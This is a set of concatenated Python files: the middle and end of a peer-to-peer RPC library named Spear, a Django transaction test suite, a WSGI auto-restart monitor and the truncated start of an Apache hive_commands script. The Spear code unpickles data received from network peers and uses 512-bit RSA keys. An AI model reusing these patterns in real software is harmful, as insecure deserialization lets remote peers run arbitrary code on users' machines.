executor.submit( self.command_one, pid, path, args=args, kwargs=kwargs) for pid in self.peers.keys()} finals = {r: results[r].result() for r in results.keys()} for f in finals.keys(): if finals[f]['result_status'] == 200: finals[f] = pickle.loads(base64.urlsafe_b64decode(finals[f]['result'].encode('utf-8'))) else: finals[f] = { 'result': 'ERROR', 'status': finals[f]['result_status'], 'reason': finals[f]['result'] } if len(finals.keys()) == 1: return finals[list(finals.keys())[0]] else: return finals class PeerNotFoundError(KeyError): pass class SpearResponse: def __init__(self, status, data): self.status = status self.data = data class Spear: # Base Peer class def __init__( self, network_name, peer_name, relays=[], network_encryption=None, advertising_port=2200, port_range=(2300, 23000), use_remote=True, use_local=True, advertise=True ): self.network_name = network_name self.name = peer_name for i in 
range(len(relays)): if not ':' in relays[i]: relays[i] = relays[i] + ':2201' self.relays = {i: { 'last_reply': time.time(), 'public_key': None } for i in relays} self.ad_port = advertising_port self.id = hashlib.sha256( str(time.time() + random.uniform(-1, 1)).encode('utf-8')).hexdigest() while True: p = random.randint(*port_range) if not check_port(p): self.service_port = p break if network_encryption == None: self.network_encryption = False else: if type(network_encryption) == str: self.network_encryption = Fernet( network_encryption.encode('utf-8')) else: self.network_encryption = Fernet(network_encryption) self.endpoints = {} self.sockets = {} (self.public, self.private) = rsa.newkeys(512) self.running = False self.peers = { 'local': {}, 'remote': {} } self.threads = {} self.responses = {} self.use_local = use_local self.use_remote = use_remote self.advertise = advertise def find_peer(self, peer_name_or_id): if peer_name_or_id in self.peers['local'].keys(): return self.peers['local'][peer_name_or_id] elif peer_name_or_id in self.peers['remote'].keys(): return self.peers['remote'][peer_name_or_id] for p in self.peers['local'].values(): if p['name'] == peer_name_or_id: return p for p in self.peers['remote'].values(): if p['name'] == peer_name_or_id: return p raise PeerNotFoundError( f'Peer with name/ID "{peer_name_or_id}" not found.') def target(self, path): # Function decorator to specify commands def dec_target(func): self.endpoints[path] = func @functools.wraps(func) def wrapper_target(*args, **kwargs): return func(*args, **kwargs) return wrapper_target return dec_target def run_advertiser(self): # Local UDP advertiser thread self.sockets['advertiser'] = socket(AF_INET, SOCK_DGRAM) self.sockets['advertiser'].setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) self.sockets['advertiser'].bind(('', 0)) self.sockets['advertiser'].setsockopt(SOL_SOCKET, SO_BROADCAST, 1) while self.running: raw_packet = '§'.join([str(i) for i in [ self.network_name, self.id, self.name, ip() + ':' + str(self.service_port), base64.urlsafe_b64encode( self.public.save_pkcs1()).decode('utf-8'), ','.join(self.relays) ]]) if self.network_encryption: finished_packet = ('e§'+base64.urlsafe_b64encode(self.network_encryption.encrypt( raw_packet.encode('utf-8'))).decode('utf-8')+'\n').encode('utf-8') else: finished_packet = ('d§'+raw_packet+'\n').encode('utf-8') self.sockets['advertiser'].sendto( finished_packet, ( '<broadcast>', self.ad_port ) ) time.sleep(1) self.sockets['advertiser'].close() def discover_local_loop(self): # Local discovery thread s = socket(AF_INET, SOCK_DGRAM) s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) s.bind(('', self.ad_port)) while self.running: data, addr = s.recvfrom(1024) data = data.decode('utf-8') if not data.endswith('\n'): continue if data.startswith('e§'): try: proc_packet = self.network_encryption.decrypt(base64.urlsafe_b64decode( data.split('e§')[1].strip('\n').encode('utf-8'))).decode('utf-8').split('§') except InvalidToken: continue else: proc_packet = data.split('§', maxsplit=1)[1].strip().split('§') for i in proc_packet[5].split(','): if not i in self.relays.keys(): if ':' in i: r_ip = i else: r_ip = i + ':2201' self.relays[r_ip] = { 'last_reply': time.time(), 'public_key': None } if proc_packet[1] == self.id or proc_packet[0] != self.network_name: continue proc_packet = { 'id': proc_packet[1], 'name': proc_packet[2], 'network': proc_packet[0], 'address': proc_packet[3], 'public_key': rsa.PublicKey.load_pkcs1(base64.urlsafe_b64decode(proc_packet[4].encode('utf-8'))), 'ping_time': time.time(), 
'type': 'local' } self.peers['local'][proc_packet['id']] = proc_packet.copy() def check_peer_timeouts(self): # Peer timeout thread while self.running: for k in list(self.peers['local'].keys()): if self.peers['local'][k]['ping_time'] + 2 < time.time(): del self.peers['local'][k] for k in list(self.peers['remote'].keys()): for r in self.peers['remote'][k]['relays'][:]: if self.relays[r]['last_reply'] + 2 < time.time(): self.peers['remote'][k]['relays'].remove(r) if len(self.peers['remote'][k]['relays']) == 0: del self.peers['remote'][k] time.sleep(1) def process_message(self, message): if self.network_encryption: message = self.network_encryption.decrypt( base64.urlsafe_b64decode(message)).decode('utf-8') else: message = message.decode('utf-8') key, data = message.split('§', maxsplit=1) tempfernet = Fernet(rsa.decrypt( base64.urlsafe_b64decode(key.encode('utf-8')), self.private)) data = json.loads(base64.urlsafe_b64decode(tempfernet.decrypt( base64.urlsafe_b64decode(data.encode('utf-8')))).decode('utf-8')) data['args'] = [pickle.loads(base64.urlsafe_b64decode( arg.encode('utf-8'))) for arg in data['args']] data['kwargs'] = {k: pickle.loads(base64.urlsafe_b64decode( data['kwargs'][k].encode('utf-8'))) for k in data['kwargs'].keys()} if data['path'] in self.endpoints.keys(): try: aspec = inspect.getfullargspec(self.endpoints[data['path']]) # I see you <3 if 'node' in aspec.kwonlyargs or aspec.varkw: data['kwargs']['node'] = self if 'originator' in aspec.kwonlyargs or aspec.varkw: data['kwargs']['originator'] = [data['originator'], data['originator_name']] value = self.endpoints[data['path']](*data['args'], **data['kwargs']) if type(value) == SpearResponse: status = value.status value = value.data else: status = 200 return_data = { 'type': 'response', 'originator': self.id, 'originator_name': self.name, 'originator_key': base64.urlsafe_b64encode(self.public.save_pkcs1()).decode('utf-8'), 'target': data['originator'], 'result_status': status, 'result': base64.urlsafe_b64encode(pickle.dumps(value)).decode('utf-8') } except: return_data = { 'type': 'response', 'originator': self.id, 'originator_name': self.name, 'originator_key': base64.urlsafe_b64encode(self.public.save_pkcs1()).decode('utf-8'), 'target': data['originator'], 'result_status': 500, 'result': f'Remote function encountered an unexpected error: {traceback.format_exc()}' } else: return_data = { 'type': 'response', 'originator': self.id, 'originator_name': self.name, 'originator_key': base64.urlsafe_b64encode(self.public.save_pkcs1()).decode('utf-8'), 'target': data['originator'], 'result_status': 404, 'result': f'Path "{data["path"]}" not found.' 
} encoded_response = base64.urlsafe_b64encode(json.dumps(return_data).encode('utf-8')) encrypted_response = tempfernet.encrypt(encoded_response) packed_response = base64.urlsafe_b64encode(encrypted_response) if self.network_encryption: packed_response = base64.urlsafe_b64encode(self.network_encryption.encrypt(packed_response)) return packed_response def check_one_relay(self, relay): # Function to check individual relays if not relay in self.relays.keys(): return if self.relays[relay]['last_reply'] + 2 < time.time(): self.relays[relay]['public_key'] = None if ':' in relay: host = relay.split(':')[0] port = int(relay.split(':')[1]) else: host = relay port = 2201 if self.relays[relay]['public_key'] == None: try: sock = create_connection((host, port), timeout=2) except TimeoutError: self.relays[relay]['public_key'] = None return sock.sendall(b'RSAREQUEST\n') while True: dat = sock.recv(1024) if not dat: break dat = dat.strip() try: self.relays[relay]['public_key'] = rsa.PublicKey.load_pkcs1( base64.urlsafe_b64decode(dat)) break except: pass sock.close() try: sock = create_connection((host, port), timeout=2) except TimeoutError: self.relays[relay]['public_key'] = None return packet = json.dumps({ 'peer_id': self.id, 'peer_name': self.name, 'network': self.network_name, 'public_key': base64.urlsafe_b64encode(self.public.save_pkcs1()).decode('utf-8'), 'relays': list(self.relays.keys()), 'advertise': self.advertise }) packet = 'PING:' + packet tfk = Fernet.generate_key() tempfernet = Fernet(tfk) enc = rsa.encrypt(tfk, self.relays[relay]['public_key']) to_send = base64.urlsafe_b64encode( enc)+'§'.encode('utf-8')+base64.urlsafe_b64encode(tempfernet.encrypt(packet.encode('utf-8')))+b'\n' sock.sendall(to_send) packet_response = '' while True: dat = sock.recv(1024) if not dat: break packet_response += dat.decode('utf-8').strip() if packet_response == 'error': self.relays[relay]['public_key'] = None return decrypted = tempfernet.decrypt( base64.urlsafe_b64decode(packet_response.encode('utf-8'))) processed = json.loads(decrypted) for r in processed['relays']: if not r in self.relays.keys(): if ':' in r: r_ip = r else: r_ip = r + ':2201' self.relays[r_ip] = { 'last_reply': time.time(), 'public_key': None } for p in processed['peers'].keys(): if not p in self.peers['remote'] and p != self.id: self.peers['remote'][p] = { 'id': p, 'name': processed['peers'][p][0], 'network': self.network_name, 'public_key': rsa.PublicKey.load_pkcs1(base64.urlsafe_b64decode(processed['peers'][p][1])), 'relays': [relay], 'type': 'remote' } elif p in self.peers['remote'] and not relay in self.peers['remote'][p]['relays']: self.peers['remote'][p]['relays'].append(relay) to_process = [] while len(processed['buffer']) > 0: item = processed['buffer'].pop() if item['type'] == 'resp': self.responses[item['id']] = item.copy() else: to_process.append(item.copy()) with ThreadPoolExecutor() as executor: [executor.submit(self.process_single_remote_message, m, relay) for m in to_process] self.relays[relay]['last_reply'] = time.time() sock.close() def process_single_remote_message(self, message, relay): mid = message['id'] origin = message['originator'] data = message['data'].encode('utf-8') response_message = self.process_message(data) try: sock = create_connection([relay.split(':')[0], int(relay.split(':')[1])], timeout=2) except TimeoutError: self.relays[relay]['public_key'] = None return packet = json.dumps({ 'originator': self.id, 'target': origin, 'network': self.network_name, 'id': mid, 'data': response_message.decode('utf-8') }) 
packet = 'RESP:' + packet tfk = Fernet.generate_key() tempfernet = Fernet(tfk) enc = rsa.encrypt(tfk, self.relays[relay]['public_key']) to_send = base64.urlsafe_b64encode( enc)+'§'.encode('utf-8')+base64.urlsafe_b64encode(tempfernet.encrypt(packet.encode('utf-8')))+b'\n' sock.sendall(to_send) sock.close() def check_relays(self): # Relay checker thread while self.running: with ThreadPoolExecutor() as executor: [executor.submit(self.check_one_relay, r) for r in list(self.relays.keys())] async def handle_local_connections(self, reader: asyncio.StreamReader, writer: asyncio.StreamWriter): data = await reader.readline() message = data.strip() response = self.process_message(message) + b'\n' writer.write(response) await writer.drain() writer.close() async def run_local_server(self): self.server = await asyncio.start_server(self.handle_local_connections, ip(), self.service_port) async with self.server: await self.server.serve_forever() def peer(self, target='*'): return Peer(self, target=target) def serve_forever(self): # Run SPEAR self.running = True if self.advertise and self.use_local: self.threads['advertiser'] = threading.Thread( target=self.run_advertiser, daemon=True ) if self.use_local: self.threads['discoverer'] = threading.Thread( target=self.discover_local_loop, daemon=True ) self.threads['peer_check'] = threading.Thread( target=self.check_peer_timeouts, daemon=True ) if self.use_remote: self.threads['relay_check'] = threading.Thread( target=self.check_relays, daemon=True ) if self.use_local: self.threads['local_server'] = threading.Thread( target=asyncio.run, args=[self.run_local_server()], daemon=True ) [t.start() for t in self.threads.values()] def close(self): self.running = False
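# Minimal usage sketch for the Spear/Peer classes above. Names and values are
# illustrative; it assumes two nodes on the same LAN segment so that the UDP
# advertiser/discoverer can find each other (no remote relays needed).
if __name__ == '__main__':
    node = Spear(network_name='demo-net', peer_name='worker-1', use_remote=False)

    @node.target('math/add')
    def add(a, b, **kwargs):
        # extra context (node/originator) is only injected when the endpoint
        # accepts it (see process_message); SpearResponse sets the status code
        return SpearResponse(200, a + b)

    node.serve_forever()            # starts the daemon threads and returns

    # A second process on the same network could then call:
    #   caller = Spear(network_name='demo-net', peer_name='client', use_remote=False)
    #   caller.serve_forever()
    #   time.sleep(2)               # allow UDP discovery to find 'worker-1'
    #   caller.peer('worker-1').command('math/add', 2, 3)   # -> 5

    while True:                     # keep the daemon threads alive
        time.sleep(1)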
tests.py
import sys import threading import time from unittest import skipIf, skipUnless from django.db import ( DatabaseError, Error, IntegrityError, OperationalError, connection, transaction, ) from django.test import ( TestCase, TransactionTestCase, skipIfDBFeature, skipUnlessDBFeature, ) from .models import Reporter @skipUnlessDBFeature('uses_savepoints') class AtomicTests(TransactionTestCase): """ Tests for the atomic decorator and context manager. The tests make assertions on internal attributes because there isn't a robust way to ask the database for its current transaction state. Since the decorator syntax is converted into a context manager (see the implementation), there are only a few basic tests with the decorator syntax and the bulk of the tests use the context manager syntax. """ available_apps = ['transactions'] def test_decorator_syntax_commit(self): @transaction.atomic def make_reporter(): return Reporter.objects.create(first_name="Tintin") reporter = make_reporter() self.assertSequenceEqual(Reporter.objects.all(), [reporter]) def test_decorator_syntax_rollback(self): @transaction.atomic def make_reporter(): Reporter.objects.create(first_name="Haddock") raise Exception("Oops, that's his last name") with self.assertRaisesMessage(Exception, "Oops"): make_reporter() self.assertSequenceEqual(Reporter.objects.all(), []) def test_alternate_decorator_syntax_commit(self): @transaction.atomic() def make_reporter(): return Reporter.objects.create(first_name="Tintin") reporter = make_reporter() self.assertSequenceEqual(Reporter.objects.all(), [reporter]) def test_alternate_decorator_syntax_rollback(self): @transaction.atomic() def make_reporter(): Reporter.objects.create(first_name="Haddock") raise Exception("Oops, that's his last name") with self.assertRaisesMessage(Exception, "Oops"): make_reporter() self.assertSequenceEqual(Reporter.objects.all(), []) def test_commit(self): with transaction.atomic(): reporter = Reporter.objects.create(first_name="Tintin") self.assertSequenceEqual(Reporter.objects.all(), [reporter]) def test_rollback(self): with self.assertRaisesMessage(Exception, "Oops"): with transaction.atomic(): Reporter.objects.create(first_name="Haddock") raise Exception("Oops, that's his last name") self.assertSequenceEqual(Reporter.objects.all(), []) def test_nested_commit_commit(self): with transaction.atomic(): reporter1 = Reporter.objects.create(first_name="Tintin") with transaction.atomic(): reporter2 = Reporter.objects.create(first_name="Archibald", last_name="Haddock") self.assertSequenceEqual(Reporter.objects.all(), [reporter2, reporter1]) def test_nested_commit_rollback(self): with transaction.atomic(): reporter = Reporter.objects.create(first_name="Tintin") with self.assertRaisesMessage(Exception, "Oops"): with transaction.atomic(): Reporter.objects.create(first_name="Haddock") raise Exception("Oops, that's his last name") self.assertSequenceEqual(Reporter.objects.all(), [reporter]) def test_nested_rollback_commit(self): with self.assertRaisesMessage(Exception, "Oops"): with transaction.atomic(): Reporter.objects.create(last_name="Tintin") with transaction.atomic(): Reporter.objects.create(last_name="Haddock") raise Exception("Oops, that's his first name") self.assertSequenceEqual(Reporter.objects.all(), []) def test_nested_rollback_rollback(self): with self.assertRaisesMessage(Exception, "Oops"): with transaction.atomic(): Reporter.objects.create(last_name="Tintin") with self.assertRaisesMessage(Exception, "Oops"): with transaction.atomic(): 
Reporter.objects.create(first_name="Haddock") raise Exception("Oops, that's his last name") raise Exception("Oops, that's his first name") self.assertSequenceEqual(Reporter.objects.all(), []) def test_merged_commit_commit(self): with transaction.atomic(): reporter1 = Reporter.objects.create(first_name="Tintin") with transaction.atomic(savepoint=False): reporter2 = Reporter.objects.create(first_name="Archibald", last_name="Haddock") self.assertSequenceEqual(Reporter.objects.all(), [reporter2, reporter1]) def test_merged_commit_rollback(self): with transaction.atomic(): Reporter.objects.create(first_name="Tintin") with self.assertRaisesMessage(Exception, "Oops"): with transaction.atomic(savepoint=False): Reporter.objects.create(first_name="Haddock") raise Exception("Oops, that's his last name") # Writes in the outer block are rolled back too. self.assertSequenceEqual(Reporter.objects.all(), []) def test_merged_rollback_commit(self): with self.assertRaisesMessage(Exception, "Oops"): with transaction.atomic(): Reporter.objects.create(last_name="Tintin") with transaction.atomic(savepoint=False): Reporter.objects.create(last_name="Haddock") raise Exception("Oops, that's his first name") self.assertSequenceEqual(Reporter.objects.all(), []) def test_merged_rollback_rollback(self): with self.assertRaisesMessage(Exception, "Oops"): with transaction.atomic(): Reporter.objects.create(last_name="Tintin") with self.assertRaisesMessage(Exception, "Oops"): with transaction.atomic(savepoint=False): Reporter.objects.create(first_name="Haddock") raise Exception("Oops, that's his last name") raise Exception("Oops, that's his first name") self.assertSequenceEqual(Reporter.objects.all(), []) def test_reuse_commit_commit(self): atomic = transaction.atomic() with atomic: reporter1 = Reporter.objects.create(first_name="Tintin") with atomic: reporter2 = Reporter.objects.create(first_name="Archibald", last_name="Haddock") self.assertSequenceEqual(Reporter.objects.all(), [reporter2, reporter1]) def test_reuse_commit_rollback(self): atomic = transaction.atomic() with atomic: reporter = Reporter.objects.create(first_name="Tintin") with self.assertRaisesMessage(Exception, "Oops"): with atomic: Reporter.objects.create(first_name="Haddock") raise Exception("Oops, that's his last name") self.assertSequenceEqual(Reporter.objects.all(), [reporter]) def test_reuse_rollback_commit(self): atomic = transaction.atomic() with self.assertRaisesMessage(Exception, "Oops"): with atomic: Reporter.objects.create(last_name="Tintin") with atomic: Reporter.objects.create(last_name="Haddock") raise Exception("Oops, that's his first name") self.assertSequenceEqual(Reporter.objects.all(), []) def test_reuse_rollback_rollback(self): atomic = transaction.atomic() with self.assertRaisesMessage(Exception, "Oops"): with atomic: Reporter.objects.create(last_name="Tintin") with self.assertRaisesMessage(Exception, "Oops"): with atomic: Reporter.objects.create(first_name="Haddock") raise Exception("Oops, that's his last name") raise Exception("Oops, that's his first name") self.assertSequenceEqual(Reporter.objects.all(), []) def test_force_rollback(self): with transaction.atomic(): Reporter.objects.create(first_name="Tintin") # atomic block shouldn't rollback, but force it. 
self.assertFalse(transaction.get_rollback()) transaction.set_rollback(True) self.assertSequenceEqual(Reporter.objects.all(), []) def test_prevent_rollback(self): with transaction.atomic(): reporter = Reporter.objects.create(first_name="Tintin") sid = transaction.savepoint() # trigger a database error inside an inner atomic without savepoint with self.assertRaises(DatabaseError): with transaction.atomic(savepoint=False): with connection.cursor() as cursor: cursor.execute( "SELECT no_such_col FROM transactions_reporter") # prevent atomic from rolling back since we're recovering manually self.assertTrue(transaction.get_rollback()) transaction.set_rollback(False) transaction.savepoint_rollback(sid) self.assertSequenceEqual(Reporter.objects.all(), [reporter]) class AtomicInsideTransactionTests(AtomicTests): """All basic tests for atomic should also pass within an existing transaction.""" def setUp(self): self.atomic = transaction.atomic() self.atomic.__enter__() def tearDown(self): self.atomic.__exit__(*sys.exc_info()) class AtomicWithoutAutocommitTests(AtomicTests): """All basic tests for atomic should also pass when autocommit is turned off.""" def setUp(self): transaction.set_autocommit(False) def tearDown(self): # The tests access the database after exercising 'atomic', initiating # a transaction ; a rollback is required before restoring autocommit. transaction.rollback() transaction.set_autocommit(True) @skipUnlessDBFeature('uses_savepoints') class AtomicMergeTests(TransactionTestCase): """Test merging transactions with savepoint=False.""" available_apps = ['transactions'] def test_merged_outer_rollback(self): with transaction.atomic(): Reporter.objects.create(first_name="Tintin") with transaction.atomic(savepoint=False): Reporter.objects.create(first_name="Archibald", last_name="Haddock") with self.assertRaisesMessage(Exception, "Oops"): with transaction.atomic(savepoint=False): Reporter.objects.create(first_name="Calculus") raise Exception("Oops, that's his last name") # The third insert couldn't be roll back. Temporarily mark the # connection as not needing rollback to check it. self.assertTrue(transaction.get_rollback()) transaction.set_rollback(False) self.assertEqual(Reporter.objects.count(), 3) transaction.set_rollback(True) # The second insert couldn't be roll back. Temporarily mark the # connection as not needing rollback to check it. self.assertTrue(transaction.get_rollback()) transaction.set_rollback(False) self.assertEqual(Reporter.objects.count(), 3) transaction.set_rollback(True) # The first block has a savepoint and must roll back. self.assertSequenceEqual(Reporter.objects.all(), []) def test_merged_inner_savepoint_rollback(self): with transaction.atomic(): reporter = Reporter.objects.create(first_name="Tintin") with transaction.atomic(): Reporter.objects.create(first_name="Archibald", last_name="Haddock") with self.assertRaisesMessage(Exception, "Oops"): with transaction.atomic(savepoint=False): Reporter.objects.create(first_name="Calculus") raise Exception("Oops, that's his last name") # The third insert couldn't be roll back. Temporarily mark the # connection as not needing rollback to check it. self.assertTrue(transaction.get_rollback()) transaction.set_rollback(False) self.assertEqual(Reporter.objects.count(), 3) transaction.set_rollback(True) # The second block has a savepoint and must roll back. 
self.assertEqual(Reporter.objects.count(), 1) self.assertSequenceEqual(Reporter.objects.all(), [reporter]) @skipUnlessDBFeature('uses_savepoints') class AtomicErrorsTests(TransactionTestCase): available_apps = ['transactions'] forbidden_atomic_msg = "This is forbidden when an 'atomic' block is active." def test_atomic_prevents_setting_autocommit(self): autocommit = transaction.get_autocommit() with transaction.atomic(): with self.assertRaisesMessage(transaction.TransactionManagementError, self.forbidden_atomic_msg): transaction.set_autocommit(not autocommit) # Make sure autocommit wasn't changed. self.assertEqual(connection.autocommit, autocommit) def test_atomic_prevents_calling_transaction_methods(self): with transaction.atomic(): with self.assertRaisesMessage(transaction.TransactionManagementError, self.forbidden_atomic_msg): transaction.commit() with self.assertRaisesMessage(transaction.TransactionManagementError, self.forbidden_atomic_msg): transaction.rollback() def test_atomic_prevents_queries_in_broken_transaction(self): r1 = Reporter.objects.create(first_name="Archibald", last_name="Haddock") with transaction.atomic(): r2 = Reporter(first_name="Cuthbert", last_name="Calculus", id=r1.id) with self.assertRaises(IntegrityError): r2.save(force_insert=True) # The transaction is marked as needing rollback. msg = ( "An error occurred in the current transaction. You can't " "execute queries until the end of the 'atomic' block." ) with self.assertRaisesMessage(transaction.TransactionManagementError, msg): r2.save(force_update=True) self.assertEqual(Reporter.objects.get(pk=r1.pk).last_name, "Haddock") @skipIfDBFeature('atomic_transactions') def test_atomic_allows_queries_after_fixing_transaction(self): r1 = Reporter.objects.create(first_name="Archibald", last_name="Haddock") with transaction.atomic(): r2 = Reporter(first_name="Cuthbert", last_name="Calculus", id=r1.id) with self.assertRaises(IntegrityError): r2.save(force_insert=True) # Mark the transaction as no longer needing rollback. transaction.set_rollback(False) r2.save(force_update=True) self.assertEqual(Reporter.objects.get(pk=r1.pk).last_name, "Calculus") @skipUnlessDBFeature('test_db_allows_multiple_connections') def test_atomic_prevents_queries_in_broken_transaction_after_client_close(self): with transaction.atomic(): Reporter.objects.create(first_name="Archibald", last_name="Haddock") connection.close() # The connection is closed and the transaction is marked as # needing rollback. This will raise an InterfaceError on databases # that refuse to create cursors on closed connections (PostgreSQL) # and a TransactionManagementError on other databases. with self.assertRaises(Error): Reporter.objects.create(first_name="Cuthbert", last_name="Calculus") # The connection is usable again . self.assertEqual(Reporter.objects.count(), 0) @skipUnless(connection.vendor == 'mysql', "MySQL-specific behaviors") class AtomicMySQLTests(TransactionTestCase): available_apps = ['transactions'] @skipIf(threading is None, "Test requires threading") def test_implicit_savepoint_rollback(self): """MySQL implicitly rolls back savepoints when it deadlocks (#22291).""" Reporter.objects.create(id=1) Reporter.objects.create(id=2) main_thread_ready = threading.Event() def other_thread(): try: with transaction.atomic(): Reporter.objects.select_for_update().get(id=1) main_thread_ready.wait() # 1) This line locks... (see below for 2) Reporter.objects.exclude(id=1).update(id=2) finally: # This is the thread-local connection, not the main connection. 
connection.close() other_thread = threading.Thread(target=other_thread) other_thread.start() with self.assertRaisesMessage(OperationalError, 'Deadlock found'): # Double atomic to enter a transaction and create a savepoint. with transaction.atomic(): with transaction.atomic(): Reporter.objects.select_for_update().get(id=2) main_thread_ready.set() # The two threads can't be synchronized with an event here # because the other thread locks. Sleep for a little while. time.sleep(1) # 2) ... and this line deadlocks. (see above for 1) Reporter.objects.exclude(id=2).update(id=1) other_thread.join() class AtomicMiscTests(TransactionTestCase): available_apps = ['transactions'] def test_wrap_callable_instance(self): """#20028 -- Atomic must support wrapping callable instances.""" class Callable: def __call__(self): pass # Must not raise an exception transaction.atomic(Callable()) @skipUnlessDBFeature('can_release_savepoints') def test_atomic_does_not_leak_savepoints_on_failure(self): """#23074 -- Savepoints must be released after rollback.""" # Expect an error when rolling back a savepoint that doesn't exist. # Done outside of the transaction block to ensure proper recovery. with self.assertRaises(Error): # Start a plain transaction. with transaction.atomic(): # Swallow the intentional error raised in the sub-transaction. with self.assertRaisesMessage(Exception, "Oops"): # Start a sub-transaction with a savepoint. with transaction.atomic(): sid = connection.savepoint_ids[-1] raise Exception("Oops") # This is expected to fail because the savepoint no longer exists. connection.savepoint_rollback(sid) def test_mark_for_rollback_on_error_in_transaction(self): with transaction.atomic(savepoint=False): # Swallow the intentional error raised. with self.assertRaisesMessage(Exception, "Oops"): # Wrap in `mark_for_rollback_on_error` to check if the transaction is marked broken. with transaction.mark_for_rollback_on_error(): # Ensure that we are still in a good state. self.assertFalse(transaction.get_rollback()) raise Exception("Oops") # Ensure that `mark_for_rollback_on_error` marked the transaction as broken … self.assertTrue(transaction.get_rollback()) # … and further queries fail. msg = "You can't execute queries until the end of the 'atomic' block." with self.assertRaisesMessage(transaction.TransactionManagementError, msg): Reporter.objects.create() # Transaction errors are reset at the end of an transaction, so this should just work. Reporter.objects.create() def test_mark_for_rollback_on_error_in_autocommit(self): self.assertTrue(transaction.get_autocommit()) # Swallow the intentional error raised. with self.assertRaisesMessage(Exception, "Oops"): # Wrap in `mark_for_rollback_on_error` to check if the transaction is marked broken. with transaction.mark_for_rollback_on_error(): # Ensure that we are still in a good state. self.assertFalse(transaction.get_connection().needs_rollback) raise Exception("Oops") # Ensure that `mark_for_rollback_on_error` did not mark the transaction # as broken, since we are in autocommit mode … self.assertFalse(transaction.get_connection().needs_rollback) # … and further queries work nicely. Reporter.objects.create() class NonAutocommitTests(TransactionTestCase): available_apps = [] def setUp(self): transaction.set_autocommit(False) def tearDown(self): transaction.rollback() transaction.set_autocommit(True) def test_orm_query_after_error_and_rollback(self): """ ORM queries are allowed after an error and a rollback in non-autocommit mode (#27504). 
""" r1 = Reporter.objects.create(first_name='Archibald', last_name='Haddock') r2 = Reporter(first_name='Cuthbert', last_name='Calculus', id=r1.id) with self.assertRaises(IntegrityError): r2.save(force_insert=True) transaction.rollback() Reporter.objects.last() def test_orm_query_without_autocommit(self): """#24921 -- ORM queries must be possible after set_autocommit(False).""" Reporter.objects.create(first_name="Tintin") class DurableTestsBase: available_apps = ['transactions'] def test_commit(self): with transaction.atomic(durable=True): reporter = Reporter.objects.create(first_name='Tintin') self.assertEqual(Reporter.objects.get(), reporter) def test_nested_outer_durable(self): with transaction.atomic(durable=True): reporter1 = Reporter.objects.create(first_name='Tintin') with transaction.atomic(): reporter2 = Reporter.objects.create( first_name='Archibald', last_name='Haddock', ) self.assertSequenceEqual(Reporter.objects.all(), [reporter2, reporter1]) def test_nested_both_durable(self): msg = 'A durable atomic block cannot be nested within another atomic block.' with transaction.atomic(durable=True): with self.assertRaisesMessage(RuntimeError, msg): with transaction.atomic(durable=True): pass def test_nested_inner_durable(self): msg = 'A durable atomic block cannot be nested within another atomic block.' with transaction.atomic(): with self.assertRaisesMessage(RuntimeError, msg): with transaction.atomic(durable=True): pass def test_sequence_of_durables(self): with transaction.atomic(durable=True): reporter = Reporter.objects.create(first_name='Tintin 1') self.assertEqual(Reporter.objects.get(first_name='Tintin 1'), reporter) with transaction.atomic(durable=True): reporter = Reporter.objects.create(first_name='Tintin 2') self.assertEqual(Reporter.objects.get(first_name='Tintin 2'), reporter) class DurableTransactionTests(DurableTestsBase, TransactionTestCase): pass class DurableTests(DurableTestsBase, TestCase): pass
monitor.py
""" Restart the WSGI daemon process in development when files have changed. """ import atexit import os import queue import signal import sys import threading __author__ = 'Alex Laird' __copyright__ = 'Copyright 2018, Alex Laird' __version__ = '0.2.3' _interval = 1.0 _times = {} _files = [] _running = False _queue = queue.Queue() _lock = threading.Lock() def _restart(path): _queue.put(True) prefix = 'monitor (pid=%d):' % os.getpid() print(f'{prefix} Change detected to "{path}".') print(f'{prefix} Triggering process restart.') os.kill(os.getpid(), signal.SIGINT) def _modified(path): try: # If path doesn't denote a file and were previously # tracking it, then it has been removed or the file type # has changed so force a restart. If not previously # tracking the file then we can ignore it as probably # pseudo reference such as when file extracted from a # collection of modules contained in a zip file. if not os.path.isfile(path): return path in _times # Check for when file last modified. mtime = os.stat(path).st_mtime if path not in _times: _times[path] = mtime # Force restart when modification time has changed, even # if time now older, as that could indicate older file # has been restored. if mtime != _times[path]: return True except: # If any exception occurred, likely that file has been # been removed just before stat(), so force a restart. return True return False def _monitor(): while 1: # Check modification times on all files in sys.modules. for module in list(sys.modules.values()): if not hasattr(module, '__file__'): continue path = getattr(module, '__file__') if not path: continue if os.path.splitext(path)[1] in ['.pyc', '.pyo', '.pyd']: path = path[:-1] if _modified(path): return _restart(path) # Check modification times on files which have # specifically been registered for monitoring. for path in _files: if _modified(path): return _restart(path) # Go to sleep for specified interval. try: return _queue.get(timeout=_interval) except: pass _thread = threading.Thread(target=_monitor) _thread.setDaemon(True) def _exiting(): try: _queue.put(True) except: pass _thread.join() atexit.register(_exiting) def track(path): if path not in _files: _files.append(path) def start(interval=0.5): global _interval if interval < _interval: _interval = interval global _running _lock.acquire() if not _running: print(f'Monitoring codebase for changes: (pid={os.getpid()})') _running = True _thread.start() _lock.release()
hive_commands.py
#!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to you under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import datetime
import threading
import time
import random

from audit_logger import AuditLogger
from config import Config
from optparse import OptionParser
from system_requests import SystemRequests


def main():
    parser = OptionParser(usage="Usage: %prog [options]")
    parser.add_option("-d", "--days", dest="no_of_days", type="int",
                      help="[REQUIRED] Number of days to run this script")
    parser.add_option("-t", "--threads", dest="no_of_threads", default=1, type="int",
                      help="Number of thread count")
    parser.add_option("-e", "--execution", dest="no_of_execution", default=1000, type="int",
                      help="Number of execution count")
    (options, args) = parser.parse_args()

    if options.no_of_days is None:
        options.no_of_days = int(raw_input('Enter number of days to run this script:'))
    if options.no_of_threads is None:
        options.no_of_threads = int(raw_input('Enter number of thread count:'))
    if options.no_of_execution is None:
        options.no_of_execution = int(raw_input('Enter number of execution count:'))

    current_time = datetime.datetime.now()
    end_time = current_time + datetime.timedelta(days=options.no_of_days)

    system_requests = SystemRequests('hive')
    machine_config = Config()
